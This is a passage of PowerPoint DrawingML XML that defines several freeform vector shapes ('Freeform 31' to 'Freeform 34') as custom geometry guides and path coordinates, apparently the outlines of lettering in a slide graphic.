                  <a:gd name="T87" fmla="*/ 157 h 5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94" h="589">
                    <a:moveTo>
                      <a:pt x="257" y="157"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="257" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="309" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="361" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="361" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="157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66" name="Freeform 31"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3997325" y="1258888"/>
                <a:ext cx="215900" cy="234950"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 446 w 600"/>
                  <a:gd name="T1" fmla="*/ 515 h 652"/>
                  <a:gd name="T2" fmla="*/ 446 w 600"/>
                  <a:gd name="T3" fmla="*/ 515 h 652"/>
                  <a:gd name="T4" fmla="*/ 436 w 600"/>
                  <a:gd name="T5" fmla="*/ 556 h 652"/>
                  <a:gd name="T6" fmla="*/ 425 w 600"/>
                  <a:gd name="T7" fmla="*/ 572 h 652"/>
                  <a:gd name="T8" fmla="*/ 410 w 600"/>
                  <a:gd name="T9" fmla="*/ 588 h 652"/>
                  <a:gd name="T10" fmla="*/ 410 w 600"/>
                  <a:gd name="T11" fmla="*/ 588 h 652"/>
                  <a:gd name="T12" fmla="*/ 378 w 600"/>
                  <a:gd name="T13" fmla="*/ 614 h 652"/>
                  <a:gd name="T14" fmla="*/ 341 w 600"/>
                  <a:gd name="T15" fmla="*/ 635 h 652"/>
                  <a:gd name="T16" fmla="*/ 341 w 600"/>
                  <a:gd name="T17" fmla="*/ 635 h 652"/>
                  <a:gd name="T18" fmla="*/ 310 w 600"/>
                  <a:gd name="T19" fmla="*/ 645 h 652"/>
                  <a:gd name="T20" fmla="*/ 283 w 600"/>
                  <a:gd name="T21" fmla="*/ 651 h 652"/>
                  <a:gd name="T22" fmla="*/ 252 w 600"/>
                  <a:gd name="T23" fmla="*/ 645 h 652"/>
                  <a:gd name="T24" fmla="*/ 231 w 600"/>
                  <a:gd name="T25" fmla="*/ 641 h 652"/>
                  <a:gd name="T26" fmla="*/ 231 w 600"/>
                  <a:gd name="T27" fmla="*/ 641 h 652"/>
                  <a:gd name="T28" fmla="*/ 205 w 600"/>
                  <a:gd name="T29" fmla="*/ 625 h 652"/>
                  <a:gd name="T30" fmla="*/ 184 w 600"/>
                  <a:gd name="T31" fmla="*/ 604 h 652"/>
                  <a:gd name="T32" fmla="*/ 168 w 600"/>
                  <a:gd name="T33" fmla="*/ 578 h 652"/>
                  <a:gd name="T34" fmla="*/ 152 w 600"/>
                  <a:gd name="T35" fmla="*/ 541 h 652"/>
                  <a:gd name="T36" fmla="*/ 0 w 600"/>
                  <a:gd name="T37" fmla="*/ 157 h 652"/>
                  <a:gd name="T38" fmla="*/ 136 w 600"/>
                  <a:gd name="T39" fmla="*/ 105 h 652"/>
                  <a:gd name="T40" fmla="*/ 273 w 600"/>
                  <a:gd name="T41" fmla="*/ 462 h 652"/>
                  <a:gd name="T42" fmla="*/ 273 w 600"/>
                  <a:gd name="T43" fmla="*/ 462 h 652"/>
                  <a:gd name="T44" fmla="*/ 294 w 600"/>
                  <a:gd name="T45" fmla="*/ 498 h 652"/>
                  <a:gd name="T46" fmla="*/ 310 w 600"/>
                  <a:gd name="T47" fmla="*/ 515 h 652"/>
                  <a:gd name="T48" fmla="*/ 310 w 600"/>
                  <a:gd name="T49" fmla="*/ 515 h 652"/>
                  <a:gd name="T50" fmla="*/ 331 w 600"/>
                  <a:gd name="T51" fmla="*/ 520 h 652"/>
                  <a:gd name="T52" fmla="*/ 362 w 600"/>
                  <a:gd name="T53" fmla="*/ 515 h 652"/>
                  <a:gd name="T54" fmla="*/ 362 w 600"/>
                  <a:gd name="T55" fmla="*/ 515 h 652"/>
                  <a:gd name="T56" fmla="*/ 378 w 600"/>
                  <a:gd name="T57" fmla="*/ 504 h 652"/>
                  <a:gd name="T58" fmla="*/ 389 w 600"/>
                  <a:gd name="T59" fmla="*/ 498 h 652"/>
                  <a:gd name="T60" fmla="*/ 399 w 600"/>
                  <a:gd name="T61" fmla="*/ 483 h 652"/>
                  <a:gd name="T62" fmla="*/ 404 w 600"/>
                  <a:gd name="T63" fmla="*/ 472 h 652"/>
                  <a:gd name="T64" fmla="*/ 410 w 600"/>
                  <a:gd name="T65" fmla="*/ 457 h 652"/>
                  <a:gd name="T66" fmla="*/ 410 w 600"/>
                  <a:gd name="T67" fmla="*/ 441 h 652"/>
                  <a:gd name="T68" fmla="*/ 399 w 600"/>
                  <a:gd name="T69" fmla="*/ 399 h 652"/>
                  <a:gd name="T70" fmla="*/ 263 w 600"/>
                  <a:gd name="T71" fmla="*/ 53 h 652"/>
                  <a:gd name="T72" fmla="*/ 399 w 600"/>
                  <a:gd name="T73" fmla="*/ 0 h 652"/>
                  <a:gd name="T74" fmla="*/ 599 w 600"/>
                  <a:gd name="T75" fmla="*/ 525 h 652"/>
                  <a:gd name="T76" fmla="*/ 473 w 600"/>
                  <a:gd name="T77" fmla="*/ 572 h 652"/>
                  <a:gd name="T78" fmla="*/ 446 w 600"/>
                  <a:gd name="T79" fmla="*/ 515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00" h="652">
                    <a:moveTo>
                      <a:pt x="446" y="515"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="446" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="515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67" name="Freeform 32"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4183063" y="1209675"/>
                <a:ext cx="115887" cy="228600"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 132 w 322"/>
                  <a:gd name="T1" fmla="*/ 57 h 635"/>
                  <a:gd name="T2" fmla="*/ 153 w 322"/>
                  <a:gd name="T3" fmla="*/ 131 h 635"/>
                  <a:gd name="T4" fmla="*/ 158 w 322"/>
                  <a:gd name="T5" fmla="*/ 131 h 635"/>
                  <a:gd name="T6" fmla="*/ 158 w 322"/>
                  <a:gd name="T7" fmla="*/ 131 h 635"/>
                  <a:gd name="T8" fmla="*/ 169 w 322"/>
                  <a:gd name="T9" fmla="*/ 89 h 635"/>
                  <a:gd name="T10" fmla="*/ 189 w 322"/>
                  <a:gd name="T11" fmla="*/ 52 h 635"/>
                  <a:gd name="T12" fmla="*/ 189 w 322"/>
                  <a:gd name="T13" fmla="*/ 52 h 635"/>
                  <a:gd name="T14" fmla="*/ 200 w 322"/>
                  <a:gd name="T15" fmla="*/ 36 h 635"/>
                  <a:gd name="T16" fmla="*/ 216 w 322"/>
                  <a:gd name="T17" fmla="*/ 20 h 635"/>
                  <a:gd name="T18" fmla="*/ 232 w 322"/>
                  <a:gd name="T19" fmla="*/ 10 h 635"/>
                  <a:gd name="T20" fmla="*/ 253 w 322"/>
                  <a:gd name="T21" fmla="*/ 5 h 635"/>
                  <a:gd name="T22" fmla="*/ 253 w 322"/>
                  <a:gd name="T23" fmla="*/ 5 h 635"/>
                  <a:gd name="T24" fmla="*/ 263 w 322"/>
                  <a:gd name="T25" fmla="*/ 0 h 635"/>
                  <a:gd name="T26" fmla="*/ 263 w 322"/>
                  <a:gd name="T27" fmla="*/ 0 h 635"/>
                  <a:gd name="T28" fmla="*/ 279 w 322"/>
                  <a:gd name="T29" fmla="*/ 0 h 635"/>
                  <a:gd name="T30" fmla="*/ 321 w 322"/>
                  <a:gd name="T31" fmla="*/ 131 h 635"/>
                  <a:gd name="T32" fmla="*/ 321 w 322"/>
                  <a:gd name="T33" fmla="*/ 131 h 635"/>
                  <a:gd name="T34" fmla="*/ 300 w 322"/>
                  <a:gd name="T35" fmla="*/ 136 h 635"/>
                  <a:gd name="T36" fmla="*/ 300 w 322"/>
                  <a:gd name="T37" fmla="*/ 136 h 635"/>
                  <a:gd name="T38" fmla="*/ 279 w 322"/>
                  <a:gd name="T39" fmla="*/ 141 h 635"/>
                  <a:gd name="T40" fmla="*/ 279 w 322"/>
                  <a:gd name="T41" fmla="*/ 141 h 635"/>
                  <a:gd name="T42" fmla="*/ 242 w 322"/>
                  <a:gd name="T43" fmla="*/ 157 h 635"/>
                  <a:gd name="T44" fmla="*/ 242 w 322"/>
                  <a:gd name="T45" fmla="*/ 157 h 635"/>
                  <a:gd name="T46" fmla="*/ 226 w 322"/>
                  <a:gd name="T47" fmla="*/ 167 h 635"/>
                  <a:gd name="T48" fmla="*/ 216 w 322"/>
                  <a:gd name="T49" fmla="*/ 183 h 635"/>
                  <a:gd name="T50" fmla="*/ 216 w 322"/>
                  <a:gd name="T51" fmla="*/ 183 h 635"/>
                  <a:gd name="T52" fmla="*/ 205 w 322"/>
                  <a:gd name="T53" fmla="*/ 199 h 635"/>
                  <a:gd name="T54" fmla="*/ 200 w 322"/>
                  <a:gd name="T55" fmla="*/ 220 h 635"/>
                  <a:gd name="T56" fmla="*/ 200 w 322"/>
                  <a:gd name="T57" fmla="*/ 220 h 635"/>
                  <a:gd name="T58" fmla="*/ 200 w 322"/>
                  <a:gd name="T59" fmla="*/ 241 h 635"/>
                  <a:gd name="T60" fmla="*/ 205 w 322"/>
                  <a:gd name="T61" fmla="*/ 267 h 635"/>
                  <a:gd name="T62" fmla="*/ 305 w 322"/>
                  <a:gd name="T63" fmla="*/ 587 h 635"/>
                  <a:gd name="T64" fmla="*/ 169 w 322"/>
                  <a:gd name="T65" fmla="*/ 634 h 635"/>
                  <a:gd name="T66" fmla="*/ 0 w 322"/>
                  <a:gd name="T67" fmla="*/ 99 h 635"/>
                  <a:gd name="T68" fmla="*/ 132 w 322"/>
                  <a:gd name="T69" fmla="*/ 57 h 6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22" h="635">
                    <a:moveTo>
                      <a:pt x="132" y="57"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="153" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="587"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="634"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="57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68" name="Freeform 33"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4287838" y="1128713"/>
                <a:ext cx="120650" cy="274637"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 137 w 337"/>
                  <a:gd name="T1" fmla="*/ 0 h 762"/>
                  <a:gd name="T2" fmla="*/ 169 w 337"/>
                  <a:gd name="T3" fmla="*/ 115 h 762"/>
                  <a:gd name="T4" fmla="*/ 32 w 337"/>
                  <a:gd name="T5" fmla="*/ 152 h 762"/>
                  <a:gd name="T6" fmla="*/ 0 w 337"/>
                  <a:gd name="T7" fmla="*/ 36 h 762"/>
                  <a:gd name="T8" fmla="*/ 137 w 337"/>
                  <a:gd name="T9" fmla="*/ 0 h 762"/>
                  <a:gd name="T10" fmla="*/ 189 w 337"/>
                  <a:gd name="T11" fmla="*/ 183 h 762"/>
                  <a:gd name="T12" fmla="*/ 336 w 337"/>
                  <a:gd name="T13" fmla="*/ 724 h 762"/>
                  <a:gd name="T14" fmla="*/ 195 w 337"/>
                  <a:gd name="T15" fmla="*/ 761 h 762"/>
                  <a:gd name="T16" fmla="*/ 48 w 337"/>
                  <a:gd name="T17" fmla="*/ 220 h 762"/>
                  <a:gd name="T18" fmla="*/ 189 w 337"/>
                  <a:gd name="T19" fmla="*/ 183 h 7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37" h="762">
                    <a:moveTo>
                      <a:pt x="137" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="169" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="189" y="183"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="336" y="724"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="761"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="183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69" name="Freeform 34"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4383088" y="1114425"/>
                <a:ext cx="149225" cy="257175"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 173 w 415"/>
                  <a:gd name="T1" fmla="*/ 0 h 715"/>
                  <a:gd name="T2" fmla="*/ 210 w 415"/>
                  <a:gd name="T3" fmla="*/ 157 h 715"/>
                  <a:gd name="T4" fmla="*/ 289 w 415"/>
                  <a:gd name="T5" fmla="*/ 136 h 715"/>
                  <a:gd name="T6" fmla="*/ 310 w 415"/>
                  <a:gd name="T7" fmla="*/ 231 h 715"/>
                  <a:gd name="T8" fmla="*/ 231 w 415"/>
                  <a:gd name="T9" fmla="*/ 252 h 715"/>
                  <a:gd name="T10" fmla="*/ 299 w 415"/>
                  <a:gd name="T11" fmla="*/ 546 h 715"/>
                  <a:gd name="T12" fmla="*/ 299 w 415"/>
                  <a:gd name="T13" fmla="*/ 546 h 715"/>
                  <a:gd name="T14" fmla="*/ 310 w 415"/>
                  <a:gd name="T15" fmla="*/ 572 h 715"/>
                  <a:gd name="T16" fmla="*/ 320 w 415"/>
                  <a:gd name="T17" fmla="*/ 588 h 715"/>
                  <a:gd name="T18" fmla="*/ 320 w 415"/>
                  <a:gd name="T19" fmla="*/ 588 h 715"/>
                  <a:gd name="T20" fmla="*/ 336 w 415"/>
                  <a:gd name="T21" fmla="*/ 598 h 715"/>
                  <a:gd name="T22" fmla="*/ 362 w 415"/>
                  <a:gd name="T23" fmla="*/ 593 h 715"/>
                  <a:gd name="T24" fmla="*/ 362 w 415"/>
                  <a:gd name="T25" fmla="*/ 593 h 715"/>
                  <a:gd name="T26" fmla="*/ 378 w 415"/>
                  <a:gd name="T27" fmla="*/ 588 h 715"/>
                  <a:gd name="T28" fmla="*/ 378 w 415"/>
                  <a:gd name="T29" fmla="*/ 588 h 715"/>
                  <a:gd name="T30" fmla="*/ 394 w 415"/>
                  <a:gd name="T31" fmla="*/ 582 h 715"/>
                  <a:gd name="T32" fmla="*/ 414 w 415"/>
                  <a:gd name="T33" fmla="*/ 682 h 715"/>
                  <a:gd name="T34" fmla="*/ 414 w 415"/>
                  <a:gd name="T35" fmla="*/ 682 h 715"/>
                  <a:gd name="T36" fmla="*/ 373 w 415"/>
                  <a:gd name="T37" fmla="*/ 693 h 715"/>
                  <a:gd name="T38" fmla="*/ 373 w 415"/>
                  <a:gd name="T39" fmla="*/ 693 h 715"/>
                  <a:gd name="T40" fmla="*/ 325 w 415"/>
                  <a:gd name="T41" fmla="*/ 703 h 715"/>
                  <a:gd name="T42" fmla="*/ 325 w 415"/>
                  <a:gd name="T43" fmla="*/ 703 h 715"/>
                  <a:gd name="T44" fmla="*/ 289 w 415"/>
                  <a:gd name="T45" fmla="*/ 714 h 715"/>
                  <a:gd name="T46" fmla="*/ 257 w 415"/>
                  <a:gd name="T47" fmla="*/ 714 h 715"/>
                  <a:gd name="T48" fmla="*/ 257 w 415"/>
                  <a:gd name="T49" fmla="*/ 714 h 715"/>
                  <a:gd name="T50" fmla="*/ 231 w 415"/>
                  <a:gd name="T51" fmla="*/ 714 h 715"/>
                  <a:gd name="T52" fmla="*/ 215 w 415"/>
                  <a:gd name="T53" fmla="*/ 703 h 715"/>
                  <a:gd name="T54" fmla="*/ 215 w 415"/>
                  <a:gd name="T55" fmla="*/ 703 h 715"/>
                  <a:gd name="T56" fmla="*/ 200 w 415"/>
                  <a:gd name="T57" fmla="*/ 688 h 715"/>
                  <a:gd name="T58" fmla="*/ 184 w 415"/>
                  <a:gd name="T59" fmla="*/ 661 h 715"/>
                  <a:gd name="T60" fmla="*/ 184 w 415"/>
                  <a:gd name="T61" fmla="*/ 661 h 715"/>
                  <a:gd name="T62" fmla="*/ 163 w 415"/>
                  <a:gd name="T63" fmla="*/ 593 h 715"/>
                  <a:gd name="T64" fmla="*/ 90 w 415"/>
                  <a:gd name="T65" fmla="*/ 283 h 715"/>
                  <a:gd name="T66" fmla="*/ 21 w 415"/>
                  <a:gd name="T67" fmla="*/ 299 h 715"/>
                  <a:gd name="T68" fmla="*/ 0 w 415"/>
                  <a:gd name="T69" fmla="*/ 204 h 715"/>
                  <a:gd name="T70" fmla="*/ 68 w 415"/>
                  <a:gd name="T71" fmla="*/ 189 h 715"/>
                  <a:gd name="T72" fmla="*/ 31 w 415"/>
                  <a:gd name="T73" fmla="*/ 31 h 715"/>
                  <a:gd name="T74" fmla="*/ 173 w 415"/>
                  <a:gd name="T75" fmla="*/ 0 h 7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15" h="715">
                    <a:moveTo>
                      <a:pt x="173" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="210" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
